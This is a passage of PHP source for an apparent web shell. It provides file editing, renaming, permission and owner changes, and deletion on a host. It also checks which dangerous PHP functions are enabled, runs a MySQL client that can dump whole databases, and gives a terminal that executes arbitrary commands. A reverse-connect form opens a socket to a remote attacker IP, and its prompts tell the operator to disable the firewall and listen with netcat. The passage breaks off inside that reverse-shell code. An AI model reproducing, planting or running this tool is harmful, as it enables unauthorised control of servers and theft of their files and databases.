1413 </form>",$source,$status);
1414
1415 if(any("status",$_SESSION)) unset($_SESSION['status']);
1416
1417 if(any("save",$_REQUEST))
1418 {
1419 $new_source=$_REQUEST['sourcecode'];
1420 if(function_exists("chmod")) chmod($file,0755);
1421 $source_edit=fopen($file,'w+');
1422 $tulis=fwrite($source_edit,$new_source);
1423 fclose($source_edit);
1424 if($tulis)
1425 {
1426 $_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file));
1427 }
1428 else
1429 {
1430 $_SESSION['status']="Whoops, something went wrong...";
1431 }
1432 header("location:".php_self."?a=e&r=".urle($file));
1433 }
1434 }
1435
1436 if($_REQUEST['a']=='r')
1437 {
1438 printf("<form class='new' method='post'>
1439 <input type='text' name='name' value='%s'/>
1440 <input type='Submit' value='Rename' name='rename'/>
1441 <label>%s</label>
1442 </form>",basename($file),$status);
1443
1444 if(any("status",$_SESSION)) unset($_SESSION['status']);
1445
1446 if(any("rename",$_REQUEST))
1447 {
1448 $path=pathinfo(trim($file));
1449 $newname=$path['dirname']._.trim($_REQUEST['name']);
1450 if(!rename(trim($file),$newname))
1451 {
1452 $_SESSION['status']='Whoops, something went wrong...';
1453 }
1454 else
1455 {
1456 $_SESSION['status']='Renamed file with success';
1457 }
1458 header("location:".php_self."?a=r&r=".urle($newname));
1459 }
1460 }
1461
1462 if($_REQUEST['a']=='c')
1463 {
1464 printf("<form class='new' method='post'>
1465 <input type='text' name='octal' value='%s'/>
1466 <input type='Submit' value='Chmod' name='chmod'/>
1467 <label>%s</label>
1468 </form>",substr(decoct(fileperms($file)),2),$status);
1469
1470 if(any("status",$_SESSION)) unset($_SESSION['status']);
1471
1472 if(any("chmod",$_REQUEST))
1473 {
1474 $octal=octdec($_REQUEST['octal']);
1475 if(!chmod(trim($file),$octal))
1476 {
1477 $_SESSION['status']='Whoops, something went wrong...';
1478 }
1479 else
1480 {
1481 $_SESSION['status']='Chmod file with success';
1482 }
1483 header("location:".php_self."?a=c&r=".urle($file));
1484 }
1485 }
1486
1487 if($_REQUEST['a']=='cwn')
1488 {
1489 $own='';
1490 if(function_exists('posix_getpwuid'))
1491 {
1492 $user=posix_getpwuid(fileowner($x));
1493 $own=$user['name'];
1494 }
1495
1496 printf("<form class='new' method='post'>
1497 <input type='text' name='own' value='%s'/>
1498 <input type='Submit' value='Chown' name='chown'/>
1499 <label>%s</label>
1500 </form>",$own,$status);
1501
1502 if(any("status",$_SESSION)) unset($_SESSION['status']);
1503
1504 if(any("chown",$_REQUEST))
1505 {
1506 $own=$_REQUEST['own'];
1507 if(!chown(trim($file),$own))
1508 {
1509 $_SESSION['status']='Whoops, something went wrong...';
1510 }
1511 else
1512 {
1513 $_SESSION['status']='Chown file with success';
1514 }
1515 header("location:".php_self."?a=cwn&r=".urle($file));
1516 }
1517 }
1518
1519 if($_REQUEST['a']=='cgp')
1520 {
1521 $grp='';
1522 if(function_exists('posix_getgrgid'))
1523 {
1524 $group=posix_getgrgid(filegroup($x));
1525 $grp=$group['name'];
1526 }
1527
1528 printf("<form class='new' method='post'>
1529 <input type='text' name='grp' value='%s'/>
1530 <input type='Submit' value='Chgrp' name='chgrp'/>
1531 <label>%s</label>
1532 </form>",$grp,$status);
1533
1534 if(any("status",$_SESSION)) unset($_SESSION['status']);
1535
1536 if(any("chgrp",$_REQUEST))
1537 {
1538 $grp=$_REQUEST['grp'];
1539 if(!chgrp(trim($file),$grp))
1540 {
1541 $_SESSION['status']='Whoops, something went wrong...';
1542 }
1543 else
1544 {
1545 $_SESSION['status']='Chgrp file with success';
1546 }
1547 header("location:".php_self."?a=cgp&r=".urle($file));
1548 }
1549 }
1550
1551 if($_REQUEST['a']=='t')
1552 {
1553 printf("<form class='new' method='post'>
1554 <input type='text' name='time' value='%s'/>
1555 <input type='Submit' value='Touch' name='touch'/>
1556 <label>%s</label>
1557 </form>",GetFileTime($file,"modify"),$status);
1558
1559 if(any("status",$_SESSION)) unset($_SESSION['status']);
1560
1561 if(any("touch",$_REQUEST))
1562 {
1563 $time=$_REQUEST['time'];
1564 if(!touch(trim($file),strtotime($time)))
1565 {
1566 $_SESSION['status']='Whoops, something went wrong...';
1567 }
1568 else
1569 {
1570 $_SESSION['status']='Touched file with success';
1571 }
1572 header("location:".php_self."?a=t&r=".urle($file));
1573 }
1574 }
1575
1576 if($_REQUEST['a']=='v')
1577 {
1578 printf("<div class='menu'>
1579 <ul>
1580 <li><a href='?a=v&r=%s'>Source</a></li>
1581 <li><a href='?a=v&w=f&r=%s'>iFrame</a></li>
1582 <li><a href='?a=v&w=i&r=%s'>Image</a></li>
1583 <li><a href='?a=v&w=v&r=%s'>Video</a></li>
1584 <li><a href='?a=v&w=a&r=%s'>Audio</a></li>
1585 </ul>
1586 </div>",
1587 urle($file),urle($file),
1588 urle($file),urle($file),
1589 urle($file));
1590
1591 if(is_readable($file))
1592 {
1593 if(any("w",$_REQUEST))
1594 {
1595 $url=GetUrlFromPath($file);
1596 $type=pathinfo($url)['extension'];
1597
1598 if($_REQUEST['w']=='f')
1599 {
1600 printf("<center><iframe src='%s' width='100%%' height='325' frameBorder='0'>Suck</iframe><a href='%s' target='_blank'>--> New Tab <--</a></center>",$url,$url);
1601 }
1602
1603 if($_REQUEST['w']=='i')
1604 {
1605 printf("<center><img src='%s' alt=' Not Image'/></center>",$url);
1606 }
1607
1608 if($_REQUEST['w']=='v')
1609 {
1610 printf("<center><video width='640' height='320' controls><source src='%s' type='video/%s'>Suck</video></center>",$url,$type);
1611 }
1612
1613 if($_REQUEST['w']=='a')
1614 {
1615 printf("<center><audio controls><source src='%s' type='audio/%s'>Suck</audio></center>",$url,$type);
1616 }
1617 }
1618 else
1619 {
1620 if(filesize($file) > 5242880)
1621 {
1622 printf("Lazy to Read more than 5MB Files");
1623 }
1624 else
1625 {
1626 $code=highlight_file($file,true);
1627 printf("<div class='highlight'>%s</div>",$code);
1628 }
1629 }
1630 }
1631 }
1632
1633 if($_REQUEST['a']=='h')
1634 {
1635 $c=file_get_contents($file);
1636 $n=0;
1637 $h=array('00000000<br>','','');
1638 $len=strlen($c);
1639 for($i=0;$i<$len;++$i)
1640 {
1641 $h[1].=sprintf('%02X',ord($c[$i])).' ';
1642 switch(ord($c[$i]))
1643 {
1644 case 0: $h[2].=' ';break;
1645 case 9: $h[2].=' ';break;
1646 case 10:$h[2].=' ';break;
1647 case 13:$h[2].=' ';break;
1648 default:$h[2].=$c[$i];break;
1649 }
1650 $n++;
1651 if($n==32)
1652 {
1653 $n=0;
1654 if($i+1 < $len)
1655 {
1656 $h[0].=sprintf('%08X',$i+1).'<br>';
1657 }
1658 $h[1].='<br>';
1659 $h[2].="\n";
1660 }
1661 }
1662 printf("
1663 <div id='hexdump'>
1664 <table class='hexdump'>
1665 <tr>
1666 <td><pre>%s</pre></td>
1667 <td><pre>%s</pre></td>
1668 <td><pre>%s</pre></td>
1669 </tr>
1670 </table>
1671 </div>",$h[0],$h[1],htmlspecialchars($h[2]));
1672 }
1673
1674 if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv')
1675 {
1676 printf("<form class='new' method='post'>
1677 <input type='text' name='file-dest' value='%s'/>
1678 <input type='Submit' value='%s' name='submit'/>
1679 <label>%s</label>
1680 </form>",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status);
1681
1682 if(any("status",$_SESSION)) unset($_SESSION['status']);
1683
1684 if(any("submit",$_REQUEST))
1685 {
1686 $source=$file;
1687 $dest=$_REQUEST['file-dest'];
1688
1689 if(!file_exists($dest))
1690 {
1691 if ($_REQUEST['a']=='cp')
1692 {
1693 if(!copy(trim($source),trim($dest)))
1694 {
1695 $_SESSION['status']='Whoops, cannot copying...';
1696 }
1697 else
1698 {
1699 $_SESSION['status']="Copy file with success <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
1700 }
1701 }
1702 elseif($_REQUEST['a']=='mv')
1703 {
1704 if(!copy(trim($source),trim($dest)))
1705 {
1706 $_SESSION['status']='Whoops, cannot moving...';
1707 }
1708 else
1709 {
1710 if(Remove($source))
1711 {
1712 $_SESSION['status']="Move file with success";
1713 $file=$dest;
1714 }
1715 else
1716 {
1717 $_SESSION['status']='Whoops, just copying...';
1718 }
1719 }
1720 }
1721 }
1722 else
1723 {
1724 $_SESSION['status']="Whoops, File was Exists <a href=?a=v&r='" . urle($dest) . "'>'" . basename($dest) . "'</a>";
1725 }
1726
1727 if($_REQUEST['a']=='cp')
1728 {
1729 header("location:".php_self."?a=cp&r=".urle($file));
1730 }
1731 elseif($_REQUEST['a']=='mv')
1732 {
1733 header("location:".php_self."?a=mv&r=".urle($file));
1734 }
1735 }
1736 }
1737
1738 if($_REQUEST['a']=='d')
1739 {
1740 if(file_exists($file))
1741 {
1742 header('Cache-Control:must-revalidate,post-check=0,pre-check=0');
1743 header('Content-Disposition:attachment;filename='.basename($file));
1744 header('Content-Type:application/octet-stream');
1745 header('Content-Description:File Transfer');
1746 header('Content-Transfer-Encoding:binary');
1747 header('Content-Length:'.filesize($file));
1748 header('Pragma:public');
1749 header('Expires:0');
1750 ob_clean();
1751 readfile($file);
1752 exit;
1753 }
1754 }
1755
1756 if($_REQUEST['a']=='x')
1757 {
1758 if(file_exists($file))
1759 {
1760 if(Remove($file))
1761 {
1762 header("location:".$back);
1763 }
1764 }
1765
1766 print '<font class="off">Cannot Delete</font>';
1767 }
1768 }
1769 else
1770 {
1771 print '<font class="off">File Not Found</font>';
1772 }
1773}
1774
1775if(any("x",$_REQUEST))
1776{
1777 if($_REQUEST['x']=="logout")
1778 {
1779 session_destroy();
1780 session_regenerate_id();
1781 header('location:'.php_self);
1782 }
1783 if($_REQUEST['x']=="secure")
1784 {
1785 $disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions"))));
1786
1787 $security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv',
1788 'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open',
1789 'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg',
1790 'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput',
1791 'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open',
1792 'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid',
1793 'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all',
1794 'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file',
1795 'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork',
1796 'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask',
1797 'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited',
1798 'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo',
1799 'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid',
1800 'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close',
1801 'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir',
1802 'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind',
1803 'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair',
1804 'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read',
1805 'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock',
1806 'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server',
1807 'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode');
1808
1809 sort($security);
1810 $fucks=array_unique(array_merge($disable_functions,$security));
1811 $table="";
1812 $enable=0;
1813 $disable=0;
1814 $die=array();
1815 $ready=array();
1816 $off=array();
1817 $total=count($fucks);
1818
1819 foreach($fucks as $fuck)
1820 {
1821 $table.="<tr><td></td><td>$fuck</td><td>";
1822 if(in_array($fuck,$disable_functions))
1823 {
1824 $table.="<center><font color=red>DIE</font></center>";
1825 $die[]=$fuck;
1826 $disable++;
1827 }
1828 else
1829 {
1830 if(function_exists($fuck)||is_callable($fuck))
1831 {
1832 $table.="<center><font color=green>READY</font></center>";
1833 $ready[]=$fuck;
1834 $enable++;
1835 }
1836 else
1837 {
1838 $table.="<center><font color=orange>OFF</font></center>";
1839 $off[]=$fuck;
1840 $disable++;
1841 }
1842 }
1843 $table.="</td></tr>";
1844 }
1845
1846 $risk=($enable/$total)*100;
1847 $secure=($disable/$total)*100;
1848
1849 printf("<h2 style='text-align:center'>Sec. Info v2.0.%s</h2><br>
1850 <h4 style='text-align:center;color:var(--txt-color)'>Risks Rate <font color=red>[%s%%]</font> | Secure Rate <font color=green>[%s%%]</font></h4><br><br>
1851 <div class='auto-number'>
1852 <table class='table sortable'>
1853 <thead>
1854 <tr>
1855 <th class='sorttable_nosort' width='15'>No.</th>
1856 <th>Disable Function</th>
1857 <th>Status</th>
1858 </tr>
1859 </thead>
1860 <tbody>
1861 %s
1862 </tbody>
1863 </table>
1864 <fieldset style='margin-bottom:15px'>
1865 <legend>Ready List</legend>
1866 <textarea>%s</textarea>
1867 </fieldset>
1868 <div class='divide'>
1869 <div class='divide-left'>
1870 <fieldset style='margin-bottom:15px'>
1871 <legend>Off List</legend>
1872 <textarea>%s</textarea>
1873 </fieldset>
1874 </div>
1875 <div class='divide-right'>
1876 <fieldset>
1877 <legend>Die List</legend>
1878 <textarea>%s</textarea>
1879 </fieldset>
1880 </div>
1881 </div>",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', '));
1882 }
1883 if($_REQUEST['x']=="info")
1884 {
1885 printf("<div id='php-configuration'>
1886 <form onsubmit='return false;' class='new'>
1887 <select id='php-config'>
1888 <option value='4'>INFO_CONFIGURATION</option>
1889 <option value='16' selected>INFO_ENVIRONMENT</option>
1890 <option value='32'>INFO_VARIABLES</option>
1891 <option value='8'>INFO_MODULES</option>
1892 <option value='1'>INFO_GENERAL</option>
1893 <option value='2'>INFO_CREDITS</option>
1894 <option value='64'>INFO_LICENSE</option>
1895 <option value='-1'>INFO_ALL</option>
1896 </select>
1897 <input type='submit' onclick=\"return getAjax(true,'php-info','POST','?x=info&xa=envirolment&config='+document.getElementById('php-config').value);\"/><br>
1898 </form>
1899 </div>
1900 <div id='php-info' class='result'></div>");
1901
1902 $cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID',
1903 'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI',
1904 'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON',
1905 'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR',
1906 'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR',
1907 'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR',
1908 'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE');
1909
1910 $table="";
1911 foreach($cores as $core)
1912 {
1913 $table.="<tr><td>".$core."</td><td>".@constant($core)."</td></tr>";
1914 }
1915
1916 printf("<h2>Core Predefined Constants</h2><br>
1917 <table class='table'>
1918 <thead>
1919 <tr>
1920 <th>Predefined Constants</th>
1921 <th>Value</th>
1922 </tr>
1923 <tbody>%s</tbody>
1924 </table>",$table);
1925
1926 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment")
1927 {
1928 ob_clean();
1929 phpinfo($_REQUEST['config']);
1930 $phpinfo=ob_get_contents();
1931 ob_end_clean();
1932 $phpinfo=preg_replace('%^.*<body>(.*)</body>.*$%ms','$1',$phpinfo);
1933 printf("<div id='phpinfo'>%s</div>",$phpinfo);
1934 exit;
1935 }
1936 }
1937 if($_REQUEST['x']=="db")
1938 {
1939 $connect=any("connect",$_SESSION)?$_SESSION['connect']:"";
1940 $status=any("status",$_SESSION)?$_SESSION['status']:"";
1941 $query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;";
1942
1943 if($connect==true)
1944 {
1945 $process="";
1946 $sql=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
1947 /*
1948 $result=mysql_list_processes($sql);
1949 while($row=mysql_fetch_assoc($result))
1950 {
1951 $process.=sprintf("<tr>
1952 <td>%s</td><td>%s</td><td>%s</td>
1953 <td>%s</td><td>%s</td></tr>",
1954 $row["Id"],$row["Host"],$row["db"],
1955 $row["Command"],$row["Time"]);
1956 }
1957 mysql_free_result($result);
1958 */
1959
1960 printf("<div class='database-session'>
1961 <div class='database-query'>
1962 <form action='?x=db&xa=qry' method='post'>
1963 <label>MYSQL Query<hr></label><br>
1964 <label><i style='color:#222'>
1965 show databases;<br>
1966 show tables from {database};<br>
1967 show columns from {database}.{table};<br>
1968 select count(*) from {database}.{table};<br>
1969 select * from {database}.{table}limit 0,10;</i></label>
1970 <textarea id='query' name='query'>%s</textarea><br>
1971 <input type='submit' name='disconnect' value='Disconnect'/>
1972 <input type='submit' value='Execute'/>
1973 </form>
1974 </div>
1975 <div class='database-process'>
1976 <!-- div class='mysql-process-result'>
1977 <label>Database Process <a href='?x=db&xa=proc'>♻</a><hr></label>
1978 <table class='table table-bordered'>
1979 <thead>
1980 <tr>
1981 <th>Id</th>
1982 <th>Host</th>
1983 <th>Database</th>
1984 <th>Command</th>
1985 <th>Time</th>
1986 </tr>
1987 </thead>
1988 <tbody>%s</tbody>
1989 </table>
1990 </div -->
1991 <div class='database-dump'>
1992 <label>Database Dump<hr></label>
1993 <form action='?x=db&xa=dmp' method='post'><br>
1994 <label>Database</label><input type='text' name='database' value=''/><br>
1995 <label>Output</label><input type='text' name='output' value='%s'/><br>
1996 <input type='submit' value='Dump' />
1997 <label>%s</label>
1998 </form>
1999 </div>
2000 </div>
2001 <div class='clr'></div>
2002 </div>
2003 ",$query,$process,$dir,$status);
2004
2005 }
2006 else
2007 {
2008 printf("<div id='database'>
2009 <form action='?x=db&xa=db' method='post' class='new'><br>
2010 <label>Host</label><input type='text' name='host' value='localhost'/><br>
2011 <label>Port</label><input type='text' name='port' value='3306'/><br>
2012 <label>Username</label><input type='text' name='user' value='root'/><br>
2013 <label>Password</label><input type='text' name='pass' value=''/><br>
2014 <label>Database</label><input type='text' name='dbas' value=''/><br>
2015 <input type='submit' value='Connect'/>
2016 </form>
2017 </div>");
2018 }
2019
2020 if(any("rs",$_REQUEST))
2021 {
2022 $_SESSION[$_REQUEST['rs']]='';
2023 }
2024
2025 if(any("cd",$_REQUEST))
2026 {
2027 $_SESSION['qdb']=$_REQUEST['cd'];
2028 }
2029
2030 if(any("ct",$_REQUEST))
2031 {
2032 $_SESSION['qtb']=$_REQUEST['ct'];
2033 }
2034
2035 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db")
2036 {
2037 $cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']);
2038
2039 $_SESSION['host']=$_REQUEST['host'];
2040 $_SESSION['port']=$_REQUEST['port'];
2041 $_SESSION['user']=$_REQUEST['user'];
2042 $_SESSION['pass']=$_REQUEST['pass'];
2043 $_SESSION['dbas']=$_REQUEST['dbas'];
2044
2045 if($cn)
2046 {
2047 $_SESSION['connect']=true;
2048 header('location:'.php_self.'?x=db');
2049 }
2050 else
2051 {
2052 $_SESSION['connect']=false;
2053 printf("<b class='off'>Connection Failed</b>");
2054 }
2055 }
2056
2057 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry")
2058 {
2059 $_SESSION['status']='';
2060 $con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
2061
2062 if(isset($_REQUEST['disconnect']))
2063 {
2064 mysqli_close($con);
2065 unset($_SESSION['connect']);
2066 unset($_SESSION['query']);
2067 unset($_SESSION['host']);
2068 unset($_SESSION['user']);
2069 unset($_SESSION['pass']);
2070 unset($_SESSION['dbas']);
2071 unset($_SESSION['qdb']);
2072 unset($_SESSION['qtb']);
2073 header('location:'.php_self.'?x=db');
2074 }
2075
2076 $sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;";
2077 $result=mysqli_query($con,$sql);
2078 $data=array();
2079 $name=array();
2080
2081 if($result)
2082 {
2083 while($fieldinfo=mysqli_fetch_field($result))
2084 {
2085 $name[]=$fieldinfo->name;
2086 }
2087 $data[]=$name;
2088 while($row=mysqli_fetch_row($result))
2089 {
2090 $data[]=$row;
2091 }
2092 mysqli_free_result($result);
2093 }
2094 else
2095 {
2096 $data=false;
2097 }
2098
2099 if($data!==false)
2100 {
2101 $sqdb=isset($_SESSION['qdb']) ? $_SESSION['qdb'] : '';
2102 $sqtb=isset($_SESSION['qtb']) ? $_SESSION['qtb'] : '';
2103
2104 $bsdb="<a href='?x=db&xa=qry&rs=qdb&query=show databases;'>Database</a>";
2105 $bqdb=!empty($_SESSION['qdb'])?"→ <a href='?x=db&xa=qry&rs=qtb&query=show tables from $sqdb;'>$sqdb</a>":"";
2106 $bqtb=!empty($_SESSION['qtb'])?"→ <a href='?x=db&xa=qry&query=show columns from $sqdb.$sqtb;'>$sqtb</a>":"";
2107
2108 printf("<div class='database=table'>
2109 <div class='database-breadcrumb'>%s %s %s</div>
2110 <div class='auto-number'>
2111 <table class='table sortable'>",$bsdb,$bqdb,$bqtb);
2112
2113 foreach($data as $key => $val)
2114 {
2115 if(is_array($val))
2116 {
2117 if($key==0)
2118 {
2119 print "<tr><th class='sorttable_nosort'>☰</th>";
2120 foreach($val as $key2 => $val2)
2121 {
2122 if(!is_array($val2))
2123 {
2124 print "<th>".$val2."</th>";
2125 }
2126 }
2127 print "</tr>";
2128 }
2129 else
2130 {
2131 print "<tr><td width='15'></td>";
2132 foreach($val as $key3 => $val3)
2133 {
2134 if(!is_array($val3))
2135 {
2136 if(strpos($val2,'Database')!==false)
2137 {
2138 print "<td><a href='?x=db&xa=qry&cd=$val3&query=show tables from $val3;'>$val3</a></td>";
2139 }
2140 elseif(strpos($val2,'Tables')!==false)
2141 {
2142 $val4=substr($val2,strpos($val2,'Tables_in_')+10);
2143 print "<td><a href='?x=db&xa=qry&cd=$val4&ct=$val3&query=select * from $val4.$val3 limit 0,10;'>$val3</a></td>";
2144 }
2145 else
2146 {
2147 print "<td>$val3</td>";
2148 }
2149 }
2150 }
2151 print "</tr>";
2152 }
2153 }
2154 }
2155 print "</table></div></div>";
2156 }
2157 else
2158 {
2159 print '<span class=off>Query not Executed</span>';
2160 }
2161 }
2162
2163 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp")
2164 {
2165 $database=$_REQUEST['database'];
2166 $output=$_REQUEST['output'];
2167 if (!file_exists($output)&&!empty($database))
2168 {
2169 $link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']);
2170 mysqli_set_charset($link,'utf8');
2171 mysqli_select_db($link,$database);
2172 $tables=array();
2173 $result=mysqli_query($link,'SHOW TABLES');
2174 while($row=mysqli_fetch_row($result))
2175 {
2176 $tables[]=$row[0];
2177 }
2178 $return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n";
2179 $return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n";
2180 $return.='SET AUTOCOMMIT=0;' . "\r\n";
2181 $return.='START TRANSACTION;' . "\r\n";
2182 foreach($tables as $table)
2183 {
2184 $result=mysqli_query($link,'SELECT * FROM '.$table);
2185 $num_fields=mysqli_num_fields($result);
2186 $num_rows=mysqli_num_rows($result);
2187 $i_row=0;
2188 $row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table));
2189 $return.="\n\n".$row2[1].";\n\n";
2190 if ($num_rows!==0) {
2191 $row3=@mysqli_fetch_fields($result);
2192 $return.='INSERT INTO '.$table.'( ';
2193 foreach ($row3 as $th)
2194 {
2195 $return.='`'.$th->name.'`,';
2196 }
2197 $return=substr($return,0,-2);
2198 $return.=' ) VALUES';
2199 for ($i=0;$i < $num_fields;$i++)
2200 {
2201 while($row=mysqli_fetch_row($result))
2202 {
2203 $return.="\n(";
2204 for($j=0;$j<$num_fields;$j++)
2205 {
2206 $row[$j]=addslashes($row[$j]);
2207 $row[$j]=preg_replace("#\n#","\\n",$row[$j]);
2208 if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';}
2209 if ($j<($num_fields-1)) { $return.=',';}
2210 }
2211 if (++$i_row==$num_rows) {
2212 $return.=");";
2213 }else {
2214 $return.="),";
2215 }
2216 }
2217 }
2218 }
2219 $return.="\n\n\n";
2220 }
2221 $return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n";
2222 $return.='COMMIT;';
2223 $output=pathinfo($otput)['extension']=='sql'?$output:$output.'.sql';
2224 $handle=fopen($output,'w+');
2225 fwrite($handle,$return);
2226 fclose($handle);
2227 $_SESSION['status']=sprintf("Dump with success... <a href='?a=v&r=%s' target='_blank'>'%s'</a>",urle($output),basename($output));
2228 }
2229 else
2230 {
2231 $_SESSION['status']="<span class=off>Dump Error</span>";
2232 }
2233
2234 header('location:'.php_self.'?x=db');
2235 }
2236
2237 }
2238 if($_REQUEST['x']=="terminal")
2239 {
2240 printf("
2241 <div id='terminal'>
2242 <textarea id='prompt-terminal' class='cmd' cols='122' rows='20' readonly>%s</textarea>
2243 <form onsubmit='return false;'>
2244 <label id='curdir-terminal'>$ %s:</label>
2245 <input type='text' id='terminal-input' autocomplete='off' onfocus=\"\" onkeydown=\"
2246 if(event.keyCode==13)
2247 {
2248 temp=this.value;
2249 this.value='';
2250 getAjax(true,'curdir-terminal','POST','?x=terminal&xa=terminals-curdir&cmd='+temp);
2251 return getAjax(false,'prompt-terminal','POST','?x=terminal&xa=terminals&cmd='+temp);
2252 }
2253 \" class='cmd' name=cmd cols=122 rows=2></input>
2254 </form>
2255 </div>",Execute('whoami'),$dir);
2256
2257 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals")
2258 {
2259 ob_clean();
2260 $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
2261 @chdir($dir);
2262 $charset='UTF-8';
2263 if(!Unix())
2264 {
2265 $charset='Windows-1251';
2266 }
2267 $ret=iconv($charset,'UTF-8',Execute($command));
2268 print $ret;
2269 exit;
2270 }
2271 elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir")
2272 {
2273 ob_clean();
2274 $command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
2275 if (preg_match('/cd (.*)/',$command,$dirx))
2276 {
2277 if ($dirx[1]=='..')
2278 {
2279 $dir=substr($dir,0,strrpos($dir,_));
2280 if (strlen($dir)<=2) $dir=$dir._;
2281 }
2282 else
2283 {
2284 if (is_dir($dirx[1]))
2285 {
2286 $dir=realpath($dirx[1]);
2287 }
2288 }
2289 }
2290 $_SESSION['c']=urle($dir);
2291 print '$ '.$dir.':';
2292 exit;
2293 }
2294 }
2295 if($_REQUEST['x']=="connect")
2296 {
2297 printf("<div id='connect'>
2298 <div class='connect-left'>
2299 <div class='Reverse-connect'>
2300 <fieldset>
2301 <legend>Reverse Connect</legend>
2302 <form action='?x=connect&xa=reverse-connect' method='post' onsubmit=\"
2303 return confirm('HOST will FUCKED ON ur PC or LAPTOP ?!\\nMake Sure ur FIREWALL OFF ?!\\nUSE NETCAT {nc -lvp ' + document.getElementById('reverse-port').value+'}\\n\\nTYPE \'exit\' or \'quit\' to TERMINATE')\">
2304 <label>Remote Ip</label><input type='text' name='reverse-ip' value='%s'/><br>
2305 <label>Remote Port</label><input type='text' id='reverse-port' name='reverse-port' value='1337'/><br>
2306 <label>Socket</label><select name='socket'>
2307 <option value='fsockopen'>fsockopen</option>
2308 <option value='socket_create'>socket_create</option>
2309 <option value='stream_socket_client'>stream_socket_client</option>
2310 </select><br>
2311 <input type='submit' value='Connect' />
2312 </form>
2313 </fieldset>
2314 </div>
2315 </div>
2316 <div class='connect-right'>
2317 <div class='status-connect'>
2318 <fieldset>
2319 <legend>Status</legend>
2320 <div id='connect-result'>Terminal: %s",
2321 remote_addr,Execute('whoami')
2322 );
2323
2324 if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="reverse-connect")
2325 {
2326 if($_REQUEST['socket']=="fsockopen")
2327 {
2328 $host=$_REQUEST['reverse-ip'];
2329 $port=$_REQUEST['reverse-port'];
2330 $sock=@fsockopen($host,$port,$errno,$errstr);
2331 if($errno!=0)
2332 {
